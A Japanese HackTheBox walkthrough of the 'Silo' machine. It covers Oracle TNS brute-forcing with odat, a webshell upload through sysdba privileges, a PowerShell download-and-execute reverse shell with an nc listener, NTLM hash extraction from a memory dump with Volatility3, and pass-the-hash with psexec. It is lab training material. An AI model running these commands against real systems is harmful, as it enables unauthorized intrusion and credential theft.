
【HackTheBox】Silo WriteUp






  • Oracle TNS listenerにodatで攻撃します。
  • odatで出てきたユーザscottはDBにログインができます。
  • sysdbaとしてもログインできることがわかりました。
  • sysdbaはファイルをアップロードすることができるので、webshellをアップロードします。
  • webshell経由でリバースシェルを奪うことができます。
  • マシン内を探索すると、ドロップボックスへのリンクとそのパスワードが記載されているメモがあります。
  • ドロップボックスからmemory dumpをダウンロードできます。
  • volality3を使うとadminのhash情報を抜き取ることができます。
  • このハッシュでログインをします。
  • ルートフラッグの取得



nmap -sC -sV silo.htb      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-19 21:13 EST
Nmap scan report for silo.htb (
Host is up (0.19s latency).
Not shown: 988 closed tcp ports (conn-refused)
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
|_clock-skew: mean: 4s, deviation: 0s, median: 3s
| smb2-security-mode: 
|   302: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-02-20T02:15:42
|_  start_date: 2023-02-20T02:12:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.56 seconds



feroxbuster -u http://silo.htb -k
[####################] - 2m     30000/30000   243/s   http://silo.htb/aspnet_Client/ 
[####################] - 2m     30000/30000   239/s   http://silo.htb/aspnet_client/system_web/ 



Win serverであることがわかります。/aspnet_client,/system_webも調べましたが、アクセスできませんでした。

SMB port 445 tcp



smbclient -N -L silo.htb  
session setup failed: NT_STATUS_ACCESS_DENIED


smbmap -H silo.htb
[!] Authentication error on silo.htb


crackmapexec smb silo.htb        
SMB         silo.htb        445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
crackmapexec smb silo.htb --shares
SMB         silo.htb        445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB         silo.htb        445    SILO             [-] Error enumerating shares: [Errno 32] Broken pipe
crackmapexec smb silo.htb --users 
SMB         silo.htb        445    SILO             [*] Windows Server 2012 R2 Standard 9600 x64 (name:SILO) (domain:SILO) (signing:False) (SMBv1:True)
SMB         silo.htb        445    SILO             [-] Error enumerating domain users using dc ip silo.htb: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
SMB         silo.htb        445    SILO             [*] Trying with SAMRPC protocol


Oracle port 1521 tcp





odat sidguesser -s silo.htb

[1] ( Searching valid SIDs                                      
[1.1] Searching valid SIDs thanks to a well known SID list on the server                                                                             
[+] 'XE' is a valid SID. Continue...    ########################## | ETA:  00:00:01 
100% |#############################################################| Time: 00:02:27 
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (                                                                           
100% |#############################################################| Time: 00:00:04 
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (                                                                           
[+] 'XE' is a valid SID. Continue...    ####################       | ETA:  00:00:14 
100% |#############################################################| Time: 00:02:12 
[+] SIDs found on the server: XE


  sudo odat all -s silo.htb -p 1521
[sudo] password for kali: 
[+] Checking if target is well configured for a connection...
[+] According to a test, the TNS listener is well configured. Continue...

[1] ( Is it vulnerable to TNS poisoning (CVE-2012-1675)?                                                                                               
[+] Impossible to know if target is vulnerable to a remote TNS poisoning because SID is not given.

[2] ( Searching valid SIDs                                                                                                                             
[2.1] Searching valid SIDs thanks to a well known SID list on the server
[+] 'XE' is a valid SID. Continue...  ##################################################################################################################  | ETA:  00:00:01 
100% |####################################################################################################################################################| Time: 00:02:26 
[2.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (
100% |####################################################################################################################################################| Time: 00:00:04 
[2.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (
[+] 'XE' is a valid SID. Continue...  ###################################################################################################                 | ETA:  00:00:14 
100% |####################################################################################################################################################| Time: 00:02:10 
[+] SIDs found on the server: XE

[3] ( Searching valid Service Names                                                                                                                    
[3.1] Searching valid Service Names thanks to a well known Service Name list on the server
[+] 'XE' is a valid Service Name. Continue...                               ############################################################################  | ETA:  00:00:01 
[+] 'XEXDB' is a valid Service Name. Continue...                            
100% |####################################################################################################################################################| Time: 00:02:26 
[3.2] Searching valid Service Names thanks to a brute-force attack on 1 chars now (
100% |####################################################################################################################################################| Time: 00:00:04 
[3.3] Searching valid Service Names thanks to a brute-force attack on 2 chars now (
[+] 'XE' is a valid Service Name. Continue...                               #############################################################                 | ETA:  00:00:14 
100% |####################################################################################################################################################| Time: 00:02:11 
[+] Service Name(s) found on the server: XE,XEXDB
[!] Notice: SID 'XE' found. Service Name 'XE' found too: Identical database instance. Removing Service Name 'XE' from Service Name list in order to don't do same checks twice                                                                                                                                                                        

[4] ( Searching valid accounts on the XE SID                                                                                                           
The login cis has already been tested at least once. What do you want to do:                                                                              | ETA:  00:07:33 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
[+] Valid credentials found: scott/tiger. Continue...                       ################################################                              | ETA:  00:01:50 
[+] Accounts found on 
[6] ( Testing all authenticated modules on sid:XE with the scott/tiger account                                                                         
[6.1] UTL_HTTP library ?
[-] KO
[6.2] HTTPURITYPE library ?
23:26:31 WARNING -: Impossible to fetch all the rows of the query select httpuritype('').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`                                          
[-] KO
[6.3] UTL_FILE library ?
[-] KO
[6.4] JAVA library ?
[-] KO
[6.5] DBMSADVISOR library ?
[-] KO
[6.6] DBMSSCHEDULER library ?
[-] KO
[6.7] CTXSYS library ?
[-] KO
[6.8] Hashed Oracle passwords ?
[-] KO
[6.9] Hashed Oracle passwords with a view in ORACLE_OCM?
23:26:32 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[6.10] Hashed Oracle passwords from history?
[-] KO
[6.11] DBMS_XSLPROCESSOR library ?
[-] KO
[6.12] External table to read files ?
[-] KO
[6.13] External table to execute system commands ?
[-] KO
[6.14] Oradbg ?
[-] KO
[6.15] DBMS_LOB to read files ?
[-] KO
[6.16] SMB authentication capture ?
[-] KO
[6.17] Gain elevated access (privilege escalation)?
[6.17.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[6.17.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[6.17.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[6.17.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[6.17.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[6.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[6.19] Create file on target (CVE-2018-3004)?
[-] KO
[6.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO

[7] ( Oracle users have not the password identical to the username ?                                                                                   
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password                                                                           | ETA:  00:00:00 
The login XS$NULL has already been tested at least once. What do you want to do:                                                                          | ETA:  00:00:16 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password                                                                       | ETA:  00:00:38 
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password                                                                  | ETA:  00:00:29 
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password                                                                       | ETA:  00:00:23 
[!] Notice: 'HR' account is locked, so skipping this username for password                                                                                | ETA:  00:00:19 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password                                                                             | ETA:  00:00:16 
[!] Notice: 'XDB' account is locked, so skipping this username for password#####                                                                          | ETA:  00:00:13 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password##########                                                                  | ETA:  00:00:11 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password################                                                         | ETA:  00:00:09 
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password############################                                                | ETA:  00:00:07 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password################################                                        | ETA:  00:00:06 
[!] Notice: 'DIP' account is locked, so skipping this username for password################################################                               | ETA:  00:00:04 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password#######################################################                      | ETA:  00:00:03 
100% |####################################################################################################################################################| Time: 00:00:27 
[-] No found a valid account on with usernameLikePassword module

[8] ( Testing all authenticated modules on ServiceName:XEXDB with the scott/tiger account                                                              
[8.1] UTL_HTTP library ?
[-] KO
[8.2] HTTPURITYPE library ?
23:27:17 WARNING -: Impossible to fetch all the rows of the query select httpuritype('').getclob() from dual: `ORA-29273: HTTP request failed ORA-06512: at "SYS.UTL_HTTP", line 1819 ORA-24247: network access denied by access control list (ACL) ORA-06512: at "SYS.HTTPURITYPE", line 34`                                          
[-] KO
[8.3] UTL_FILE library ?
[-] KO
[8.4] JAVA library ?
[-] KO
[8.5] DBMSADVISOR library ?
[-] KO
[8.6] DBMSSCHEDULER library ?
[-] KO
[8.7] CTXSYS library ?
[-] KO
[8.8] Hashed Oracle passwords ?
[-] KO
[8.9] Hashed Oracle passwords with a view in ORACLE_OCM?
23:27:18 WARNING -: Hashes can not be got with Oracle_OCM. This method is only valid when database is 12c or higher
[-] KO
[-] KO
[8.10] Hashed Oracle passwords from history?
[-] KO
[8.11] DBMS_XSLPROCESSOR library ?
[-] KO
[8.12] External table to read files ?
[-] KO
[8.13] External table to execute system commands ?
[-] KO
[8.14] Oradbg ?
[-] KO
[8.15] DBMS_LOB to read files ?
[-] KO
[8.16] SMB authentication capture ?
[-] KO
[8.17] Gain elevated access (privilege escalation)?
[8.17.6] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[-] KO
[8.17.7] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[8.17.8] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[8.17.9] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[8.17.10] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[-] KO
[8.18] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[-] KO
[8.19] Create file on target (CVE-2018-3004)?
[-] KO
[8.20] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[-] KO

[9] ( Oracle users have not the password identical to the username ?                                                                                   
The login XS$NULL has already been tested at least once. What do you want to do:                                                                          | ETA:  00:00:00 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password                                                                                            
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password                                                                       | ETA:  00:00:36 
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password                                                                  | ETA:  00:00:28 
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password                                                                       | ETA:  00:00:23 
[!] Notice: 'HR' account is locked, so skipping this username for password                                                                                | ETA:  00:00:19 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password                                                                             | ETA:  00:00:16 
[!] Notice: 'XDB' account is locked, so skipping this username for password#####                                                                          | ETA:  00:00:12 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password##########                                                                  | ETA:  00:00:10 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password################                                                         | ETA:  00:00:09 
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password############################                                                | ETA:  00:00:07 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password################################                                        | ETA:  00:00:06 
[!] Notice: 'DIP' account is locked, so skipping this username for password################################################                               | ETA:  00:00:04 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password#######################################################                      | ETA:  00:00:03 
100% |####################################################################################################################################################| Time: 00:00:31 
[-] No found a valid account on with usernameLikePassword module

Username: scott



msf6 auxiliary(admin/oracle/sid_brute) > run
[*] Running module against

[*] - Starting brute force on, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[-] - The connection with ( timed out.
[*] Auxiliary module execution completed


Oracle pentesting



sudo apt install oracle-instantclient-sqlplus
echo "/usr/lib/oracle/19.6/client64/lib/libsqlplus.so" >> /etc/ld.so.conf

Login to sqlplus

sudo sqlplus scott/tiger@silo.htb/XE  

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO


Sysdba login

sudo sqlplus scott/tiger@silo.htb/XE 'as sysdba'

SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            DELETE_CATALOG_ROLE            YES YES NO
SYS                            EXECUTE_CATALOG_ROLE           YES YES NO
SYS                            EXP_FULL_DATABASE              YES YES NO
SYS                            GATHER_SYSTEM_STATISTICS       YES YES NO
SYS                            HS_ADMIN_EXECUTE_ROLE          YES YES NO
SYS                            HS_ADMIN_ROLE                  YES YES NO
SYS                            HS_ADMIN_SELECT_ROLE           YES YES NO
SYS                            IMP_FULL_DATABASE              YES YES NO
SYS                            LOGSTDBY_ADMINISTRATOR         YES YES NO
SYS                            OEM_ADVISOR                    YES YES NO
SYS                            OEM_MONITOR                    YES YES NO

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            PLUSTRACE                      YES YES NO
SYS                            RECOVERY_CATALOG_OWNER         YES YES NO
SYS                            RESOURCE                       YES YES NO
SYS                            SCHEDULER_ADMIN                YES YES NO
SYS                            SELECT_CATALOG_ROLE            YES YES NO
SYS                            XDBADMIN                       YES YES NO
SYS                            XDB_SET_INVOKER                YES YES NO
SYS                            XDB_WEBSERVICES                YES YES NO
SYS                            XDB_WEBSERVICES_OVER_HTTP      YES YES NO
SYS                            XDB_WEBSERVICES_WITH_PUBLIC    YES YES NO

32 rows selected.



odat all -s silo.htb -p 1521 -d XE -U scott -P tiger --sysdba
[+] Checking if target is well configured for a connection...
[+] According to a test, the TNS listener is well configured. Continue...

[1] ( Is it vulnerable to TNS poisoning (CVE-2012-1675)?         
[+] The target is vulnerable to a remote TNS poisoning
[2] ( Testing all authenticated modules on sid:XE with the scott/tiger account                                                                
[2.1] UTL_HTTP library ?
[+] OK
[2.2] HTTPURITYPE library ?
[+] OK
[2.3] UTL_FILE library ?
[+] OK
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[+] OK
[2.7] CTXSYS library ?
[+] OK
[2.8] Hashed Oracle passwords ?
[+] OK
[2.9] Hashed Oracle passwords from history?
[+] OK
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
[2.11] External table to read files ?
[+] OK
[2.12] External table to execute system commands ?
[+] OK
[2.13] Oradbg ?
[-] KO
[2.14] DBMS_LOB to read files ?
[+] OK
[2.15] SMB authentication capture ?
[+] Perhaps (try with --capture to be sure)
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
[2.16.2] Modification of users' passwords using CREATE ANY PROCEDURE privilege only?
[-] KO
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[-] KO
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[-] KO
[2.16.5] DBA role using CREATE ANY INDEX (and CREATE PROCEDURE) privileges?
[+] OK
[2.17] Modify any table while/when he can select it only normally (CVE-2014-4237)?
[+] Impossible to know
[2.18] Create file on target (CVE-2018-3004)?
[-] KO
[2.19] Obtain the session key and salt for arbitrary Oracle users (CVE-2012-3137)?
[+] Impossible to know if the database is vulnreable to the CVE-2012-3137. You need to run this as root because it needs to sniff authentications to the database

[3] ( Oracle users have not the password identical to the username ?                                                                                   
The login XS$NULL has already been tested at least once. What do you want to do:                                                                          | ETA:  00:00:00 
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
[!] Notice: 'XS$NULL' account is locked, so skipping this username for password
[!] Notice: 'APEX_040000' account is locked, so skipping this username for password                                                                       | ETA:  00:00:52 
[!] Notice: 'APEX_PUBLIC_USER' account is locked, so skipping this username for password                                                                  | ETA:  00:00:38 
[!] Notice: 'FLOWS_FILES' account is locked, so skipping this username for password                                                                       | ETA:  00:00:30 
[!] Notice: 'HR' account is locked, so skipping this username for password                                                                                | ETA:  00:00:24 
[!] Notice: 'MDSYS' account is locked, so skipping this username for password                                                                             | ETA:  00:00:20 
[!] Notice: 'XDB' account is locked, so skipping this username for password#####                                                                          | ETA:  00:00:15 
[!] Notice: 'CTXSYS' account is locked, so skipping this username for password##########                                                                  | ETA:  00:00:13 
[!] Notice: 'APPQOSSYS' account is locked, so skipping this username for password################                                                         | ETA:  00:00:10 
[!] Notice: 'DBSNMP' account is locked, so skipping this username for password############################                                                | ETA:  00:00:08 
[!] Notice: 'ORACLE_OCM' account is locked, so skipping this username for password################################                                        | ETA:  00:00:07 
[!] Notice: 'DIP' account is locked, so skipping this username for password################################################                               | ETA:  00:00:05 
[!] Notice: 'OUTLN' account is locked, so skipping this username for password#######################################################                      | ETA:  00:00:03 
100% |####################################################################################################################################################| Time: 00:00:38 
[-] No found a valid account on with usernameLikePassword module



└─$ odat dbmsxslprocessor -s silo.htb -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot tofu.txt <(echo tofu was here)

[1] ( Put the /proc/self/fd/11 local file in the C:\inetpub\wwwroot path (named tofu.txt) of the server                                  
[+] The /proc/self/fd/11 local file was put in the remote C:\inetpub\wwwroot path (named tofu.txt)


└─$ curl http://silo.htb/tofu.txt
tofu was here


Upload web shell


└─$ odat dbmsxslprocessor -s silo.htb -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot webshell.aspx ~/Documents/Tools/webshell.aspx

[1] ( Put the /home/kali/Documents/Tools/webshell.aspx local file in the C:\inetpub\wwwroot path (named webshell.aspx) of the server     
[+] The /home/kali/Documents/Tools/webshell.aspx local file was put in the remote C:\inetpub\wwwroot path (named webshell.aspx)

Access webshell





Invoke-PowerShellTcp -Reverse -IPAddress -Port 1234


python3 -m http.server 8000

powershell IEX(New-Object Net.WebClient).downloadString('')

nc -lnvp 1234                                    
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 49172
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami 
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> 


User flag

PS C:\Users\Phineas\Desktop> ls
Directory: C:\Users\Phineas\Desktop

Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-a---          1/5/2018  10:56 PM        300 Oracle issue.txt                  
-ar--         2/20/2023   2:12 AM         34 user.txt                          

PS C:\Users\Phineas\Desktop> type user.txt

Privilege Escalation

Oracle issue text in Desktop


PS C:\Users\Phineas\Desktop> type 'Oracle issue.txt'
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 

link password:




Get oracle issue text in webshell

Password: £%Hm8646uC$

Memory dump in dropbox

file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, full dump, 261996 pages

Check VirusTotal


md5sum SILO-20180105-221806.dmp
04a302e67113e9f02fda3283dace7898  SILO-20180105-221806.dmp



Volatility3を使ってdump fileを確認します。

git clone https://github.com/volatilityfoundation/volatility3.git


python3 vol.py -f ~/Documents/htb/Silo/SILO-20180105-221806.dmp windows.info
Variable        Value

Kernel Base     0xf8007828a000
DTB     0x1a7000
Symbols file:///home/kali/Documents/htb/Silo/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/A9BBA3C139724A738BE17665DB4393CA-1.json.xz
Is64Bit True
IsPAE   False
layer_name      0 WindowsIntel32e
memory_layer    1 WindowsCrashDump64Layer
base_layer      2 FileLayer
KdVersionBlock  0xf80078520d90
Major/Minor     15.9600
MachineType     34404
KeNumberProcessors      2
SystemTime      2018-01-05 22:18:07
NtSystemRoot    C:\Windows
NtProductType   NtProductServer
NtMajorVersion  6
NtMinorVersion  3
PE MajorOperatingSystemVersion  6
PE MinorOperatingSystemVersion  3
PE Machine      34404
PE TimeDateStamp        Thu Aug 22 08:52:38 2013



python3 vol.py -f ~/Documents/htb/Silo/SILO-20180105-221806.dmp windows.hashdump.Hashdump -vv
Volatility 3 Framework 2.4.1
INFO     volatility3.cli: Volatility plugins path: ['/home/kali/Documents/htb/Silo/volatility3/volatility3/plugins', '/home/kali/Documents/htb/Silo/volatility3/volatility3/framework/plugins']
INFO     volatility3.cli: Volatility symbols path: ['/home/kali/Documents/htb/Silo/volatility3/volatility3/symbols', '/home/kali/Documents/htb/Silo/volatility3/volatility3/framework/symbols']
DEBUG    volatility3.framework: No module named 'Crypto'
DEBUG    volatility3.framework: Failed to import module volatility3.plugins.windows.cachedump based on file: /home/kali/Documents/htb/Silo/volatility3/volatility3/framework/plugins/windows/cachedump.py
DEBUG    volatility3.framework: No module named 'Crypto'
DEBUG    volatility3.framework: Failed to import module volatility3.plugins.windows.lsadump based on file: /home/kali/Documents/htb/Silo/volatility3/volatility3/framework/plugins/windows/lsadump.py
DEBUG    volatility3.framework: No module named 'Crypto'
DEBUG    volatility3.framework: Failed to import module volatility3.plugins.windows.hashdump based on file: /home/kali/Documents/htb/Silo/volatility3/volatility3/framework/plugins/windows/hashdump.py



pip install pycryptodome


python3 vol.py -f ~/Documents/htb/Silo/SILO-20180105-221806.dmp windows.hashdump.Hashdump     
Volatility 3 Framework 2.4.1
Progress:  100.00               PDB scanning finished                                
User    rid     lmhash  nthash

Administrator   500     aad3b435b51404eeaad3b435b51404ee        9e730375b7cbcebf74ae46481e07b0c7
Guest   501     aad3b435b51404eeaad3b435b51404ee        31d6cfe0d16ae931b73c59d7e0c089c0
Phineas 1002    aad3b435b51404eeaad3b435b51404ee        8eacdd67b77749e65d3b3d5c110b0969

Root flag

python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip silo.htb administrator@silo.htb
Impacket v0.10.1.dev1+20230216.13520.d4c06e7f - Copyright 2022 Fortra

[*] Requesting shares on silo.htb.....
[*] Found writable share ADMIN$
[*] Uploading file FZbfCnbH.exe
[*] Opening SVCManager on silo.htb.....
[*] Creating service SQKD on silo.htb.....
[*] Starting service SQKD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


